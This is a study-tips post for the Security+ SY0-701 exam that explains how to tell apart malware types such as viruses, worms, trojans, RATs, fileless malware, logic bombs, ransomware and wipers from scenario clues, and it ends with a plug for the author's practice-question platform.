The malware section of SY0-701 looks like pure memorization. Learn the words, match them to definitions, move on. Then you sit the exam and a question describes a scenario with no labels on it, and you have to name what happened. That is where people drop points they thought they had locked down.
The fix is to stop memorizing definitions and start hunting for the one detail in each scenario that separates one type from another. Here is how I sort the ones that get confused most.
Virus vs worm
This is the classic trap. Both self-replicate, so people treat them as interchangeable. They are not.
A virus needs two things: a host file to attach to, and a user to run that file. Open the infected document, launch the program, and it spreads. No user action, no spread.
A worm needs neither. It moves across the network on its own, exploiting a vulnerability to jump from machine to machine with nobody clicking anything.
So when a question says the infection spread to every host on the subnet overnight and no user reported opening a file, it is handing you the answer. Nobody clicked, so it is a worm. If the scenario hinges on a user opening an attachment, you are looking at a virus. The give-away is almost always whether a human action was required.
Trojan vs RAT
A trojan is malware disguised as something the user wants. The user installs it on purpose, believing it is a legitimate tool or game. The disguise is the whole point.
A RAT, or remote access trojan, is a specific kind of trojan that hands an attacker ongoing remote control of the machine. Every RAT is a trojan. Not every trojan is a RAT. If the scenario stresses that the attacker now has hands-on-keyboard access to the box, that extra detail is pointing you at RAT rather than a generic trojan.
Fileless malware
This one catches people because it breaks the mental model of malware being a file you can scan. Fileless malware runs in memory and abuses tools that are already on the system, like PowerShell or Windows Management Instrumentation. There is often nothing sitting on disk for antivirus to flag.
The tell in a question is language about no file being written to disk, legitimate system tools being used, or the code living only in memory. When you see that, stop reaching for a signature-based answer and think fileless.
Logic bomb
A logic bomb is code that sits quietly until a condition is met, then fires. The condition can be a date, a specific event, or the absence of something, like a payroll record that vanishes once an employee is terminated. The keyword to watch for is a trigger. If the malicious action waits for a time or an event, that is your logic bomb.
Ransomware vs a wiper
Both make data unavailable, and that surface similarity is the trap. Ransomware encrypts data and offers to sell you the key, so the motive is money. A wiper destroys data with no intention of giving it back, so the motive is disruption or sabotage. If the scenario mentions a ransom note or a payment demand, it is ransomware. If data is simply gone and nobody is asking for anything, think wiper, even when it first looks like ransomware that failed.
How to actually practice this
Reading definitions will not build the reflex you need on exam day. Scenario questions will. When you review, cover the answer, read the scenario, and force yourself to name the single detail that made the call: user action or not, disguise or remote control, file on disk or in memory, trigger or ransom. If you cannot point to that detail, you do not understand the question yet. You just recognize the vocabulary.
I built a study platform around this kind of practice while I was working through Security+ myself. It has 1,069 practice questions, 31 reading lessons, hands-on labs and PBQs, and acronym flashcards, all mapped to SY0-701. There is a free diagnostic exam at https://secplusmastery.com/diagnostic if you want to find out which domains are actually weak before you spend another night reviewing the ones you already know cold.
The malware objectives are not hard. They are written to reward people who read carefully. Train the reading, not the list.
Top comments (0)